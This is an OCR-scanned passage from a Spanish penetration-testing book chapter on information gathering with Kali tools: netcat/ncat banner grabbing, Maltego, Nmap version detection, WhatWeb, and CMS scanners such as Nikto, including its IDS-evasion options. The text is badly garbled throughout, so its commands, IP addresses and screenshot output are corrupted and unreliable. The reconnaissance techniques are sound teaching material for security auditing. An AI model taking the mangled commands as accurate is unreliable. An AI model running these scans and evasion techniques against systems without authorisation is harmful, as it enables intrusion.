En  el  siguiente  ejemplo  se  ha  obtenido  el  banner  de  varies  de  los  servicios  de  la  direccion  IP 
69.89.31.180,  con  el  comando  “ echo  <f  |  nc  -v  -n  -h7  69.89.3U80  2 1-8  O' :  y  se  han  obtenido  los 
sigui  entes  resultados. 


root^k^lieo:  ' 

Ai  i,hiuo 

Editor  Ve! 

hu-.i  si  Termkial  Ayuda 

Connect ion  tinea  out 

open 

#2  Mon,  Gfi  Apr  20 !3 
system  to  transport 


a.bq 

this 


open 

4,30 

this 


(UNKNOWN)  [6!?  ft  I  31  27  (?) 

(UNKNOWN)  [6%  1  3]  26  (7) 

2Wt  HftW  ft'  .com  ESHTP  Exim 

220  *Wa  do  not  authorize  the  use  of 
220  and/or  bulk  e-mail, 

500  unrecognized  command 
(UNKNOWN)  [t  ft  ■$)  2B  (smtp) 

P  ftdNH  ■■MLPom  ESHTP  Exim 
226 -Wo  do  not  authorize  the  use  of 
220  and/or  bulk  a -mail. 

500  unrecognized  command 
UNKNOWN)  [g  2  !  "p 3 

(UNKNOWN)  [  e’ 

(UNKNOWN)  {&  -J  JC] 

SSH  -2 .G-GpenSSHMs .3 
rotocdl  mismatch, 

(UNKNOWN)  [61  m  iQ]  21  (ftp)  open 

220 - -  Welcome  to  Pure-FTPd  [privsep]  [ T L S ] 

220 -You  are  user  number  9  of  1000  allowed, 

220 -Local  time  Is  now  02:4 
220 -This  is  a  private  syst 
220 -IPv6  connections  are  a 
220  You  will  Be  disconnected  after 
500  ? 


02:46; 0B  0600 
unsolicited. 


#2  Mon,  06  Apr  2013  02:40:10  0600 

system  to  transport  unsolicited, 


24 

23 

22 


(?)  :  Connection  timed  out 
(telnet)  :  Connection  timed  out 
(ssh]  open 


inactivity. 


Image n  02,08  Ejemplo  del  uso  de  hi  heiTamienta  netcat* 


En  el  ejemplo  se  puede  ver  como  se  ha  detectado  el  servicio  ESMTP  basado  en  Exim  version  4.8, 
el  servicio  SSH  2.0  basado  en  OpenSSH  version  5.3  y  un  servicio  IIP  basado  en  Pare- IT  Pd  de 
version  no  detectada  (siempre  y  cuando  los  banners  no  se  hayan  moditicado  intencionadamente), 

Con  neat,  entre  sus  muehas  posibilidades,  se  puede  establccer  conexion  con  un  servicio  que  funcione 
sobre  SSL  {Secure  Socket  Layer\  como  por  ejemplo  HTTPS,  e  interaetuar  con  el  servicio  para 
extraer  la  version  del  servidor  web  asi  como  los  melodos  hup  soportados; 
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Jill  II 

Aithlyj  ci.1it.ji  V«r  I  i'..  ,ir  fiuim.ir  i.,udA 


.  h ,\\  l«  i  ;-ff  neat 
OPTIONS  /  HTTP/1 t 1 

Host  r  MflRF  9* 


sal  1  li  l  5>6  443 


HTTP/1,1  49&  MsthcrtJ  Nat  Allowed 
Content  - T ype :  teat /ht mi ;  eharsolHJTF-B 
Content  Length:  962 
Date:  Mon,  00  Apr  2013  09:11:42  QHT 
erver:  GFE/2.0 


s 


«:DOCTYP£  html> 

<htnu  lang-fln> 

<.neta  charset=utf-S&- 

<nsta  nam^viewport  content -"initial - scale=l .  ntninum- scaled  ,  width^devlce 
dth  "> 

<titlo>Error  40^  (Method  Not  Allowed) 1 1  i«/title> 

«5tyle> 

*fiMrgin:0;  padding ;  0}  htnil ,  c  ode  {fonrt :  LSpx  /22px  a  rial ,  sans  -sa  ri  f  >ht  ml  (Parkg  roul 
nd  :  #f  f  f ; c ol o  r :f  222 ; padding :  1 5px frbodiy  {  margin :  7%  auto  0;nsax-width:390pM;iiin-haigrit[ 


:  lflSpx ;Dadding:30px  G  LSpxpy 
s/ robot .png)  I&B%  5px  no 
w :  hidden  ) ins { c  pi p  r : #777 
as  width :7?2px)  {body(backgrobnd:none; margin 

1 


lUp/  Lmages/arro  r| 
[pjc  0  22px  joverflol 
dia  screen  and  (ml 
& ; max -width : none ; p  adding  - ri ght : ®| 


Imaged  02.09:  PeciciAn  no  e.\ itosa  de  options  eon  n cat, 


Al  parecer  se  trata  de  un  sen  idor  web  Google  Front  End  version  2.0,  Se  puede  apreciar  que  el 
metodo  OPTIONS  estfi  deshabilitado.  Acontinuadon*  se  ha  lazando  esLa  misma  consults  sobre  otro 
servidor  web  donde.  ademas  de  la  version,  se  observan  los  meiodos  soportados  por  dicho  servidor, 


TTP/l.I  200  OK 

Date;  Mon,  06  Apr  2913  09:29:27  GMT 
Server:  Microsoft- IIS/6.8 
Mic rose  ft  Of TiceWebServer:  5 ,G_Pup 
/-Powered -By:  ASP.NET 
MS  Author  Via:  PS -FP/4 .3, DAY 
Content  - Length ;  0 
Accept -Ranges :  none 
GASL :  <DAV :sql> 

BAY:  I.  2 

Public:  OPTIONS,  TRACE,  GET,  HEAD,  DELETE,  PUT,  POST 
0,  PflOPPATCH.  LOCK,  UNLOCK,  SEARCH 

I  Allow:  OPTIONS,  TRACE,  GET,  HEAD,  CORY,  PROPFIND,  SEARCH 
Cache  -  Con t rol :  private 


r-n-y  /— \  n  m 


LOCK, 

m  nnnnnnn 


Imagen  02.10:  PeLicuki  exitosa  de  options  con  neat. 


Vlas  adelante  se  vera  como  herramientas  como  nmap  y  derivados,  de  manera  automatizada  analizan 
©st os  banners  y  entre  sus  resultados  muestran  la  version  del  servicio  detcctada. 


Maltego 

Una  de  I  as  principals  herramientas  para  realizar  el  procesode  recoteceidn de  informadon  es  Maltego, 
de  la  empresa  Patent.  Kali  ineluye  entre  su  reposilorio  de  herramientas  la  version  comunitaria.  Es. 
similar  a  la  FOCA  en  planteamiento,  permits  recolectar  inibrmacion  de  itna  manera  senciila.  rapida 
y  visual  (esto  ultimo  dependera  en  gran  medida  de  la  cantidad  de  resultados  obtenidos). 


Capita  So  If.  Recogida  de  inform  aciou 
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I  l.tlC-.-  J  V  dll  E-Jltl-  li  -  -  u 


Imaged  02. 1 1 :  EjcmpLo  de  la  hcrramienta  Maltego. 


Mai  f  ego  se  basa  en  entidades,  estas  entidades  son  objetos  sabre  las  que  se  aplic&ran  determ inadas 
acciones  que  se  conocen  como  transformadas.  Las  entidades  estan  divididas  en  dos  categorfas, 
Par  Lin  I  ado,  las  entidades  relacionadas  eon  las  infraestructuras,  {que  liaeen  referenda  a  todos  I  os 
atributos  de  estas  ),  de  las  que  disponga  la  compahia.  y  par  el  otro,  las  relacionadas  con  personas,  que 
abarca  todos  los  datos  references  a  los  trabajadores 


A1  igual  que  la  FOCA,  Maltego  cs  capaz  de  enlazar  mformacion  de  diversas  fuentes  y  obtener  un 
map  a  de  la  infraestmctura  que  hay  detras  de  un  determinado  dominio,  asi  como  de  los  usuarios 
relacionadas  con  el  mismo.  Ademas  Maltego  tiene  compaiibilidad  con  Face  book  y  Twitter  (se  echa 
en  falta  compatibilidad  con  Linkedin). 


Para  demostrar  el  potencial  de  la  herramienta,  se  partira  de  un  domino  web  y  se  vera  como,  por 
medio  de  transformadas,  es  posible  obtener  mformadon  de  los  servidores,  equipos,  cuentas  de 
correo,  documentos  con  sus  metadatas,  etcetera. 


A  continuation  se  mitestra  el  proceso  de  investigacidn  de  una  determinada  infraestmctura. 
Suponiendo  que  unicamente  se  conoce  cl  nombre  del  dominio,  se  le  aplicara  la  siguicntc  secuenda 
de  transformadas: 


-  DNS  from  Domain  Other  transforms  >  Domain  using  MX  (mail  server):  Transtbrmada 
encargada  de  intentar  obtener  los  servidores  MX  asociados  al  dominio. 

DNS  from  Domain  >  Of  her  transforms  >  Domain  using  NS  -  (name  server):  Esta 
transformada  obliene  los  servidores  de  nombres  del  dominio. 
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Imagen  02. 1 2:  Ob [clic ion  de  semdores  MX  y  NS  con  Mai f ego. 


-  Se  sdeceiona  el  conjunto  de  servidores  ohtenidos  (MX,  NS),  Se  ejeeuta  Resolve  IP  sobre 
todos  el  los, 

-  Volviendo  a  agrupar,  esta  vez  sobre  las  direcciones  IPs,  Se  ejecuta  Resolve  to  IP  >  IP 
owner  detail 


Se  observa  como  el  dominio  auditado  corresponde  a  la  RedIRIS,  la  red  espanola  para  Interconexion 
de  los  Recursos  Informaticos  de  las  universidades  y  centres  de  investigacion.  Una  vez  que  se  obliene 
informacidn  basiea  se  pueden  hacer  otras  transformaciones  para  obtener  aiin  mas  datos: 

Other  trasnforms  >  To  website  where  TP  appear;  Con  esta  transformada  se  realizan 
busquedas  por  las  direcciones  IP  en  los  principals  buscadores  de  Internet 

^  Ser  vldor  ea 


wtbt  aaociadaa  a  [at  IP  a  publicna 


Imagen  02.14:  Tnlerencia  de  paginal  web  t]iic  compartcji  d  misttfo  sen  idor. 


Capitulo  IL  Recogida  de  informacion 


Siguiendo  el  mismo  procedimiento  se  pueden  realizar  multiples  transformaciones,  con  el 
j neon ven I ente  de  que  si  se  hace  sin  cuidado  es  posible  que  se  generen  tanias  reiaeiones,  que  la  tarea 
t)e  analisis  de  la  infraestruetura  generada  se  haga  muy  eostosa. 


,  1  > ■'  • ' 


,  ■  * 

*  ■  « 

m  *  *  a 

*  > 

*  * 


p * n u fi  BtiSRteoid  ■  M1 Russia 

&MS  Mjffl*  B  D&sujfhunt  B  Finn* 

»  Uf'L  Q  £  Bl  Ml  A  if  B  •  P»“4  And;*  L‘„ 


Imagen  02.15:  Cirafo  resultante  lias  aplicar  riemusi atlas  iramibrmadas. 


Para  terminal  de  describir  las  hondades  de  Maltego,  existe  la  posibilidad  de  ejeeutar  unos 
pseudoscripts  persona l izados  que  se  ejecutan  de  manera  rcmota  en  servidores  extemos  Jlamados 
nukfuinas  especial  izados  en  realizar  un  determinado  tipo  de  analisis,  De  forma  adieional  es  posible 
erear  nuevas  maquinas  a  deseo  de!  auditor.  Las  que  vicnen  de  serie  en  la  versidn  comunitaria  son: 

-  Company  Stalker.  Hsta  maquina  intcntara  obtener  todas  las  direcciones  de  correo  de 
un  determinado  dominio  y  uvertguara  cuales  ofrecen  resultados  en  redes  sociales.  Ademas 
obtiene  los  documentos  alojados  en  el  dominio  v  extrae  los  metadatas,  Requiere  como  dato 
de  entrada  el  dominio  a  analizar, 

-  Footprint  LI:  Realiza  un  footprint  de  nivel  1  (rapido,  hasico)  sobre  un  dominio. 

-  Footprint  L2:  Realiza  un  footprint  de  nivel  2  (medio)  sobre  un  dominio. 

Footprint  L3:  Realiza  un  footprint  de  nivel  3  (intensive)  sobre  un  dominio,  Requiere  de 
tiempo  y  consume  muchos  recursos,  Se  recam  ienda  usarlo  eon  cuidado. 

-  Person  -  Email  Adress:  Intenta  obtener  las  direcciones  de  correo  de  una  determ  inada 
persona  y  averigua  los  sitios  webs  en  los  que  aparecem  Requiere  como  dato  de  entrada  una 
direccidn  de  correo  inicial 

Prune  Leaf  Entities :  Elimina  las  entidades  sin  nodos  dependientes, 

Twitter  Digger:  Busca  una  determ  inada  frase  como  un  alias  de  Twitter.  Hs  posihle  que 
esta  maquina  sc  vea  bloqucada  por  la  API  de  Twitter  al  ejecutarse  en  varias  ocas i ones, 

-  Twitter  Geo  Location :  Intenta  encontrar  la  geolocalizacion  de  una  determ  inada  persona 
en  Twitter  utilizando  diferentes  tecnicas. 

-  Twitter  Monitor:  Monitoriza  Twitter  en  busca  de  los  hash  tags,  y  entidades  men  cion  ad  as 
que  aparecen  en  tome  a  una  determ  inada  frase. 

URL  To  Network  Add  Domain  Information :  A  partir  de  una  URL  obtiene  informacion  de 
la  red  y  del  dominio  al  que  pertenece. 
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Fingerprinting  Web 

La  Guia  de  Pruebas  OWASP  considers  la  obtencidn  dc  la  firms  digital  de  los  servidores  web 
como  una  tares  escncia)  para  el  auditor.  Saber  el  tipo  y  version  del  servidor  en  ejecucidin  permitiri 
detenntnar  vtilnerabilidades  conocidas,  y  los  exploits  apropiados  a  usar  durante  el  test  de  intrusion, 

Ademas  de  identifies!  los  servicios  web,  results  muy  importante  obtener  tambien  los  posibles  CMS 
(Content  management  System)  o  gestures  de  contenido  asi  como  los  plugins/addons  utilizados  en 
el  mismo.  En  finea  con  los  dos  parados  an  ten  ores,  el  proceso  de  fingerprinting  constara  de  los 
siguientes  pasos; 

Identificacion  del  servidor  web. 

-  Identificacion  del  CMS. 

-  Identificacion  de  vulnerabilidades  y  plugins  de  los  CMS. 

Identificacion  del  servidor  web 

Tradicionalmente.  las  herramientas  por  excelencia  utilizadas  para  realizar  esta  tarea  eran  HTTP 
Recon  y  HTTP  Print .  El  alto  numero  de  falsos  positives  y  la  dependencia  del  6xito  del  analysis  en 
una  base  de  datos  dc  timias  webs  muy  reducida,  ha  hecho  que  estas  herramientas  queden  relegadas 
a  un  segundo  piano  y  ya  no  se  encuentrcn  disponibles  en  suites  de  seguridad  como  Kali.  En  su  tugar 
hay  que  recurrir  at  analisis  del  Banner  del  servicio  o  de  otra  serie  de  herramientas  especializadas. 


De  la  amplia  variedad  de  herramientas  de  deteecidn  de  servicios  se  ha  mencionado  antes  neat,  y 
a  conlinuacion  se  va  a  explicar  un  use  puntual  del  polifacetico  Nmap,  en  concrete  de  su  version 
graft  ca  zenmap  por  ser  mas  sencilla  de  utifizar  v  mostrar  los  resultados  de  manera  organ  izada.  La 
herramienta  en  si  probablemente  requeririu  un  libro  adidonal  para  poder  expliearla  en  profundidad. 
En  la  configuracidn  por  defecto  Nmap  solo  muestra  la  version  del  servicio  en  caso  de  estar 
totalmente  segura,  sin  embargo  es  posible  pedirle  con  un  comando  adicional  que  realice  una  bateria 
de  pruebas  para  intentar  determ inar  la  version  de  los  distintos  servicios.  A  eontinuaeion  se  muestran 
los  resultados  obtenidos  por  Nmap  en  una  determinada  pagina  web  utilizando  la  configuracion  por 
defeelo,  seleccionando  el  perfil  “Quick  Scan  . 


Imagen  02. 16:  Analisis  h&sico  con  Nmap. 


Captiulo  11.  Recogida  de  information 


cj  sgconfigUTa  para  que  averigiie  la  version  de  los  servicios  aSadiendo  los  argu mentos  "-sV —version- 
light "  se  obtiene: 


Si**  PmfiLff  HsLg 

mm  «1 


Ernfrijfi 


V  Pt4M' 


•V  j  [%w\ 


tBwmwtf  i'untp  iv  T  +  -F  upfirah-ligrit  ml  M 
Hgmjj  t  Mirap  □iftpji  Pfrrti/iHoiTi  Ivf&otp,  Huai  Detail  kHi 


OS  Mcul 


nmiip  t¥  -T*  -r  ■  ■  wium-Ugh!  vt 


Z  DetaLi 


S’ acting  Mmso  e  .  ab  l  http://nmp.Dn3  *>  at 

rfBl  Mr  14  CEST 

f+ncp  Gt  nri  rnpi  •  fOi  w.:,l  1-5  I  ltt  MfcAMtO' 

hear  la  up  <9.33e,  latency! ■ 
ftpt  shown  9e  filtflrad  port* 

PORT  ST*  J  r  M  R¥  J  CE  VI.  HSL  UN 

,  7JL/tcp  open  ftp  ProFTP’O  13-3 

j  Z2/trp  open  »ih? 

BB/icp  liptn  ottp  Sun  lava  Sfatea  tittpd  7.0 

4+3, ‘top  open  tiLtps? 

Service  detec tlon  porrcimnn.  Please  report  ar.y 
inte  rred  results  at  nttp : /Vrifiac  . orfl/BJbmit / 

Ump  done:  1  IP  address  [1  nast  upl  «cannMl  In 
Sit. £9  K*H.nr.rfK 


fill*!  I  Ioete 


tm&gen  02.17:  Nmap  i  delete  ion  de  version  de  los  servicios. 


No  obstante,  incluso  aunque  nmap  sea  capaz  de  cnumcrar  la  version  del  servidor,  es  posible  que  se 
trate  de  un  fatso  positivo,  En  funcion  de  la  versidn  dc  la  herramienta  utilizada,  los  scripts  implicados 
v  las  protecciones  que  pueda  haber  desde  el  lado  del  servidor  los  resultados  pod  ran  varian 


lmagcn  02,18:  Dcteccidn  de  los  servicios  con  h  version  para  Windows  de  Nmap. 


De  manera  adicional,  y  para  contrastar  datos,  resulta  convenient  lanzar  tambien  la  herramienta 
wharweb.  Esta  herramienta  sera  mostrada  en  el  siguiente  apartado  de  esta  seecion. 


IdeiitiHciicidn  del  CMS 

Oran  parte  de  los  sitios  web  implantados  se  basan  en  gestures  de  eonlenido  posteriormente 
Persunalizados,  de  ahi  se  deduce  la  importancia  de  idenlificar  de  que  gestor  de  contenidos  se  train, 
una  buena  herramienta  para  proccder  a  su  identificacion  es  What  Web. 
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What  Web 

WhatWeb  idemifica  Ids  sinus  webs.  Su  intone  ion  os  responder  a  la  pregun  ta,  “tlQue  es  este  si  tin 
web?”  WhatWeb  reconoce  tecnologias  web  mcluyendo  ge  stores  de  contenido,  blogs,  anal  is  is 
estadistico  de  paquetes,  librenas  JavaScript,  servidores  web,  y  dispositivos  embebidos. 


A  modo  do  ejemplo,  so  presenta  el  analisis  do  dos  platafonnas completamente  diferentes,  la  primera 
basada  en  SharePoint  do  Microsoft  y,  la  segunda  basada  on  Word  Press. 


roDl@>kdtico:  - 


Edtii  ■  i  Eokiail  TeunMni  A'jUJj 


:--tt  whatweb  v  ww  mrai  ■  om 

/usfAib/rutoy/i  .9.1/rxiby(pBiiis/custoin_n0qiJina.  rb:3€:in  ‘require1:  iconv  will  be  de 
precated  in  The  tutu  re „  use  St ring#enccde  instead. 
ht  lp://ww|iontf  k  m  am/  [  332] 

http : /Am|  HUrifettt  [3021  ASPNEl  ,  CountryLSPAIN \{  IS]  „  KTTPServer [Bit 
rosoft-riS/7. 5]  ,  IP[Hm»]  .  Hicrosof  t-IIST/.S]  ,  Hicrosoft-Sharepointl  14. 
0.0.68291.  RedirertLocat  j.<Hi[liir4ii MRKf  aull ,  aspi  |,  Title] 
Documento  ido)  .  UncommonHeader  s[  spreqwestguld,  i  -  sfonn-pr:.  inthealthsccre,  mitr oso 
F tshdrepointteaiivber  vices] ,  I-Powered-By [  ASP.  MET] 

Status  :  302 

ASP  PiFT  - -  - *-** - 

Description:  ASP.NET  is  a  free  wqfc  framework,  that  enables  great  Web 

applications.  Used  by  millions  of  dew elopers,  lr  runs  some 
Of  the  biggest  sites  in  the  world.  -  homepage: 
http : //www. asp .not/ 


Country 

Description: 


nngs  to.  This  use® 
ti&rs  on  updating  the 


database  are  in  the  plugin  comments. 
String  :  SPAIN 


Imapcn  02.19:  Utilizaeidn  de  la  herramienta  whatweb  soforc  un  CMS  Share  Point, 


rvotfPRalkc  “ 


E-JJtsf 


Quitjh  ^irrmlnal 


am/  1200] 

http://  am/  [290]  Cookies [wo rrfpress  homepage]  ,  Country  [UNITED  STATES]  [ 

US],  HTB!  S.  HTTPSenrcrlpgin*] .  TP [  76. 74 .  ?54  ,  126] „  NetaGenerator  [WordPress .  coml  . 
0pen6raphPreTO€0l[blO5lI?1D6133114tl0] „  CpenSearchf  hu  .  v m  «  <  ^earc 

h,  xri'ljhttlr:  Jf sfc-  Offl/OSd.xml] ,  PasswordFieltl[pwd]  ,  Script,  Title [WcrdP res s 
.cc  " .  t  Free  Blog.  Hg  J ,  WordPress,  3t-UA-Compfltible[IE=10]  ,  nqimc 

URL  :  htl|  ig  -v  com/ 

Status  :  200 

Cookies  -  - - —  -  ■  — . —  *■- - -  -  -  -  -  -  ^ 

Description;  Display  the  names  af  cookies  :n  the  HTTP  headers.  Tne 
values  are  not  returned  to  save  on  space. 

String  :  worefpress  honvepaqe 


Country  - - - - - - 

Description:  Shows  the  country  the  IPv4  address  belongs  to.  This  uses 
the  Geo IP  IP2Count  ry  database  from 
http://sofxwflre77 .ret/geo-Lp/ .  T net rgc t i on®  on  updating  the 


database  a^e  in 
String  :  UNITE 

Nodul e  :  US 


the  plugin  comments 


MINL^i 


h  4  *  •  r  ■  :  ‘ 

Djasc^igtion^H^i^Vfirsu^S^JjTectgd^ 


Imagcn  02 .20;  Utiltzttci6n  cie  [a  berramienta  whatweb  sobre  un  CMS  WbrdPress. 


II  comando  ejecutado  para  la  realization  del  analisis  en  a  mhos  casos  ha  si  do  ^  whatweb  -v  paghui 
web  \  este  comando  facilita  la  presentation  de  la  information  de  manera  detallada  y  por  seccioncs* 


Identificacton  dc  vulnerabilidades  y  plugins  de  los  CMS 

Debido  a  la  expansion  de  determ  inados  gestores  de  contenido,  ha  sido  necesario  el  desarrollo 
ik  aplicaciones  especialtzadas  en  determinar  la  version  exaeta  del  gestor  y  las  vulnerabilidades 
asociadas  al  mismo.  Estos  gestores  de  contenido  estan  disenados  para  ser  modulares,  permitiendo 
incorporar  tantos  plugins  eomo  scan  necesarios  para  personalizar  la  logics  dc  la  aplieacion  web, 
Muchos  de  ellos  hail  sido  desarrollados  por  program  adores  ajenos  a!  grupo  principal  de  desarrollo, 
gstc  tipo  de  modularidad  genera,  en  muchos  casos,  gran  cantidad  de  vulnerabilidades  que  pueden 
llegar  a  ser  utiiizadas  para  comptometer  el  sitio  web.  En  base  a  esto,  ex  isle  n  ciertas  aplicaciones 
eentradas  en  analizar,  para  un  determinado  gestor  de  contenido,  su  version  y plugins  asociados. 


Uis  prinei pales  herraimentas  iticlukias  en  Kali  para  la  realizacion  de  esta  fase  de  la  auditoria  son; 

-  BlindElephant:  De  proposito  general,  por  defecto  contiene  un  listado  de  plugins  de 
Drupal  y  \Vord Press. 

-  Nikto:  Dc  proposito  general, 

-  Plecosf :  Especial izad a  en  WordPress. 

Wpscan:  Especial izada  en  WordPress. 

-  JoomScan:  Espec i a  1  i zada  en  Juanita. 


Antes  de  usar  cualquiera  de  esias  herramientas  conviene  mirar  en  la  ayuda  si  existe  la  posibilidad  dc 
actual izar  el  listado  de  plugins  de  manera  automdtica,  En  BlindElephant  se  realiza  con  el  argumento 
14 "  y  en  Nikto  con  ei  argumento  "-update  \ 


BlindElephant 

F  I  funcionamiento  basico  de  BlindElephant  se  realiza  con  el  comando  "  BlindElephant  pagina  web 
tipo_cms'\  Esta  herromienta  analiza  el  CMS,  y  tras  estudiar  la  existencia  de  determ  inados  plugins  en 
el  mis  mo,  muestra  en  los  resultados  las  posibles  estimaciones  acerca  de  la  version  de  la  plataforma 
CMS  que  se  este  analizando. 


ail  r.ei  ■ 

ihf.f  tdhar 

T  Si  i Mil 

!.il  A’.irda 

$1  ->[31  |=$r->[31]  ;  $-->[31] -Jr3[3l J  ; 

m 

+  ERROR:  flo  authentication  .naaa&r  asfirad:  / 

+  Sflryer  banner  has  changed  from  Kicnmafl.'  HS/7,5  to  Microsoft -HTTPAPI/?.S  r  ihi 
a  may  su-ggest  a  W4F  or  load  balancer  is  in  place 

i-  Q5VDH  2B360:  .-_Mti_bln/sntml  .dl  l /_vt  ._'^!:Vrr^Lhuu=servflr+versn)h%3.flrt%2e0%?i!?^7e 
36 lit  Gl^es  info  about  sarvar  iei tings.  CVF-3B00-04L3,  CVt • • 0769 .  CVE  20G0-Q 
710,  mtfl://www-9ttcyrliyfatus  .com/bid/lG0B,  http  ://wuw,  security  focus,  com /did/]  17 

h 

*  QS  vDB  -  :  t  _h  t  i  _b  Itsfji  t  i_aut  /  aut  hs  r ,  dll  7<n#  t  hod  =1 L  s  t  *  dec  umsm  n\ la  3^2a*M»2.a  7%3a 

]  rv  it  f namo-fil  int  Hiddon&M *=  t  rusSl  in  t Espl  o  ra  rOoc  n  t  ru»fc  l  i  *t  R*c  u  rse» t  el  ne 

.till  is i F i'l  os  »t  n,f9& Us  t Fol d#  r* =t  ruafil is t L  inK  I n  f a  T  ruefcl  1st  Inc l uda^a  rant ruaSl  i s t D® 
rl vad T* f aluftl A  •  i  Bo nJa ra ^ f «1  a :  tfa  id  news  authoring  arcana  la  in*  Front  Page 

Mb* 

+  ftSVPfl  *73:  /_vt 1  pwt/«*rv t t a.cnf :  Contains  mate  information  about  tna  wab  aary 
ar  Raaova  or  ACL  if  FrantPafla  la  not  doing  uaed. 

+  fiSVOB  A?2:  fm  vTij>Vt/Mrvlca»,cHil' ;  Contains  tha  liat  of  ’Kutiwoba.  Siamova  or  ACL 
if  FrenlPay#  net  being  usad.  rayaal  snrver  variion  i"1  Acunin  ha*  th&ngad 
it* 

*  DSVDB'3092:  /aitaaap  .*mli  This  tt^hh  a  nua  Uat.Lng  s  f  tha  sit#  eofltant. 


r  DSVO0-3233:  /  ati.  inf .html r 
D#r  [cherd-.  HTML  SQurc#  for  mo 

I 


lo± 


and  a  l  e,  its  varaion  numl 


Etna  gen  02.21:  Ejemplo  de  los  resultados  de  la  herramienta  Nikto. 
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Pen  testing  con  Kali 


Pleen  Hi 

Para  putter  ultlizar  Piecostes  ncce&ario  conseguiren  primer  higar  im  listado  de  plugins  de  WordPress. 
tarea  que  no  es  dificil  de  llevar  a  cabo  pero  requiere  un  paso  adicional  a  la  liora  de  lanzar  el  escaner. 

JoomScan 

Por  ultimo,  para  ejecutar  JoomScan  unicamente  hay  que  ejecutar  la  instruct:  i6n  "joomsccm  -u  sitio _ 
weh  eon  ello  se  lanzaran  una  serie  de  scripts  para  comprobar  la  segurid&d  del  sitio,  y  al  igual  que 
Nikto*,  tnostrara  el  segmento  de  la  direceion  URL  de  cada  uno  de  los  fa  1 1  os  de  seguridad  encontrados, 

Mikto 

Es  una  de  las  mejores  herramienlas  de  auditor! a  web.  se  podrfa  decir  que  esta  al  nivel  de  Nmap 
y  se  complements  pertectamente  eon  la  misrna.  Su  comando  basico  consiste  en  ejecutar  “nikto. 
-h  pugtna_\veh"  y  realiza  un  escaner  de  todo  el  sitio  web,  detectando  la  version  del  servidor,  la 
tecnologia  utiiizada.  algunos  compommientos  sospechosos  como  balanceadores  de  carga,  diversas 
vulnerabilidades  detafladas,  etcetera. 

A Ukto  es  capaz  de  detectar  gran  cantidad  de  vulnerabilidades  en  servidores  web  y  comprende  un 
enorme  abanico  de  opeiones  a  la  hora  de  llevar  a  cabo  test  de  intrusion.  A I  igual  que  Nmap,  Nikto  es 
compatible  con  MetasphiU  lo  cual  facilim aim  mas  la  tarea  de  explotacion.  Una  de  las  caracteristicas 
a  destacar  es  ei  Scan  Tuning  ",  que  permite  personal  izar  ios  tipos  de  test  a  llevar  a  cabo  durante  el 
ana  I  is  is  del  equipo  objelivo.  eonsiguiendo  eon  ello  ivUneir  d  ruido  generado  por  la  henamienia.  A 
eontinuacion  se  eitan  los  dtsiintos  tipos  de  test  que  la  herramienta  es  capaz  de  llevar  a  cabo: 

-  Arch i vos  jugosos  /  Vislo  en  los  registros. 

-  Fallos  de  configuradon  /  Archives  por  defecto. 

-  Descubrimiento  de  informacion. 

-  1  ny ecc  i  ones  ( X  S  S/S  er  ipt/H  T  ML ) . 

-  Obtencion  de  arehivos  remotos  -  Denlro  de  la  raiz  de  la  web. 

-  Denegacidn  de  servicio. 

-  Obtencion  de  archives  remotos  -  Desde  el  lado  del  servidor. 

-  Ejecucion  de  comandos  -  Obtencion  de  Shell  remote 
Inyeccion  SQL. 

-  Subida  de  archives. 

Evasion  de  autenticacion, 

Identificacion  de  software. 

Inclusion  de  cod  i  go  remoto* 


Junto  a  la  anterior  caracteristica.  tambien  existen  distintas  tecnicas  de  evasion  con  el  objetivo  de 
haeerlo  mas  sigiloso  ante  I DS/J  PS/WAR  Para  dlo  se  apoya  en  la  librerfa  de  Perl  libwhisker  que 
permite  persona  I  izar  los  paquetes  HTTP  para  eludir  firm  as. 


Ln  combinacion  con  los  anteriores  se  puede  usar  la  opcion  mutate ,  que  permite  combi nar  distintas 
tecnicas  para  enumerar  listados  de  usuarios  y  directories.  Un  dato  a  destacar  es  la  agresividad  de  este 
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Capituio  II.  Reeogida  de  information 


plugin,  el  cual  genera  un  volumen  de  trafico  clevado.  Como  medida  de  precaution.  Nik  to  cuenta  con 
|a  option  de  esperar  cntre  las  distintas  pruebas  un  determ  in  ado  intervale  de  tiempo  a  especificar  por 
el  auditor  medianteel  argumento  “-Pause  segundos 

Al  igual  que  el  reslo  de  escineres  de  CMS.  los  plugins  son  cruciales  en  el  luncionamiento  de  Nikto. 
ya  que  ali mentan  las  distintas  tecnieas  de  explotacion  que  es  capa/de  llevaracabo.  Para consultar  la 
lista  conipleta  de  plugins  instalados  hay  que  ejecutar  el  siguiente  comando:  "nikto  -list plugins Al 
ejecutarei  anterior  comando  mostrara  en  ultimo  lugar  las  macros  definidas.  Dichas  macros  pcmiilen 
eombinar  los  plugins  a  voluntad. 


I  .os  plugins  outdated  y  subdomain  a  port  an  informaci6n  imeresante.  Gracias  al  primero  Nikto  es 
capaz  de  detectar  si  la  version  de  Apache  se  encuentra  desactualizada,  si  el  equipo  se  encuentra  Iras 
un  WAF  o  si  es  posibk  que  se  encuenlre  tras  un  balanceador  de  cargar  debido  a!  cambio  del  banner 
del  mismo  (en  cuyo  caso  seria  recomendable  realizar  mas  pruebas  con  herramientas  como  hping3, 
fragroute.  fragmuter  y  wafwOOf).  Por  su  parte,  el  plugin  subdomain  proporciona  i n form ac ion  sobre 
posibles  nombres  de  dominio  coti  los  que  seguir  con  la  investigation. 


pe fined  plugin  macros : 

@i3N0N&  = 

g  @ A LL  =  "robots;  repo  rt  _c  s  u ;  rspo  rt_nbe ;  embedded ;  repo  nt  ml ;  out  da t  ed ;  c  g  i ;  r epo  rt  I 
nul ; ssl ; apa c he  qx pec t _xss ; h$ad& re ; apacheuse r s ; m u 1 1 pi e_i nde x ; subdo main ; iregs ; au t h ; 
h 1 1  pop  t ion  s ; die  t i ona ry ; pu t_del _test ;;cookles; tests; con tent_searcr; repo rt_t e  *t ; f f 
aeon1 

@@DF FAULT  -  "  ALL ;  -  f  @NUT ATE ;  t#st  s  t  rape  rt| 

[expanded]  =  H  ;httpoptions  Readers;  mut. 

10  rt  xml ;  apac house  re ;  repo  rt_nbe ;  cookies ; 

ti;cbntant  search;  report  _tstf  ;ipsgs;  repo rt_htnfl ; test  s{  report : 500)  ;  repo «  ;  root 

s" 

rdfdMU  1  ATE  - Ip r.a rv : subdomain" 


Itnagen  02.22:  Macros  por  detect  o  en  Nikto, 


Nikto  tambien  reaiiza  el  descubrimierito  de  interfaces  de  administration  y  paginas  de  login  conocidas 


y  que  pueden  ser  objetos  de  ataques  de  fuerza  bruta. 


SMB 

En  redes  de  ordenadores,  SMB  (Server  Message  Block)*  tambien  conocido  como  Cl  I  S  (X  onwwtn 
